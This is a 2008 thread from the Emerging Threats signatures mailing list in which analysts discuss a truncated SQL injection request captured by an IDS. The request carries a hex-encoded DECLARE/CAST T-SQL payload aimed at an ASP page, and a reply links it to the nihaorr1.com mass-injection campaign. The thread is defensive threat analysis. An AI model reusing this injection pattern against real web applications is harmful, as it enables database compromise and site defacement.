[Emerging-Sigs] Interesting SQL Injection attempts

[Joel Esler]

This is the same sort of sql injection from the nihaorr1.com stuff a  
couple weeks ago.

J

On May 13, 2008, at 1:41 PM, Matt Jonkman wrote:

> This sent in from someone that's got to remain anonymous. Anyone have
> more info or theories?
>
> ----------
>
>  A week or so ago I started seeing a lot of hits on sid 2008175 WEB
> Possible SQL Injection (varchar) from APNIC.  Today, I'm seeing lots  
> of
> a broken variant (?) from more than one geo NIC with the first seen  
> from
> RIPE.  It starts off the same as the 2008175 hits I've been monitoring
> but is somehow truncated.  It makes it as far as declaring the '@C
> varchar(25' then has another (hex) 3 I assume should lead into a x35
> (char 5) but is overlaid with http header..  Different user-agent info
> also.    Odd!!!    xxx's denote sanitizing.  Any ideas what is going  
> on?
>
>
>
> GET /xxxxx/apps/contact/xxx
> xxx.asp?id=86&subcatid=62
> ;DECLARE%20 at S%20
> NVARCHAR(4000);S
> ET%20 at S=CAST(0x4
> 400450043004C004
> 1005200450020004
> 0005400200076006
> 1007200630068006
> 1007200280032003
> 500350029002C004
> 0004300200076006
> 1007200630068006
> 1007200280032003
> 5003www.xxxx.u
> s HTTP/1.1..Acce
> pt: text/html, a
> pplication/xml;q
> =0.9, applicatio
> n/xhtml+xml, */*
> ;q=0.1..Accept-L
> anguage: en-gb..
> Accept-Encoding:
>  deflate..User-A
> gent: Mozilla/5.
> 0 (Windows NT 5.
> 1; U; en; rv:1.8
> .0) Gecko/200607
> 28 Firefox/1.5.0
>  Opera 9.25..Hos
> t: www.xxxxx.us
> ..Connection: Cl
> ose....
>
>
>
> -- 
> --------------------------------------------
> Matthew Jonkman
> Emerging Threats
> Phone 765-429-0398
> Fax 312-264-0205
> http://www.emergingthreats.net
> --------------------------------------------
>
> PGP: http://www.jonkmans.com/mattjonkman.asc
>
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>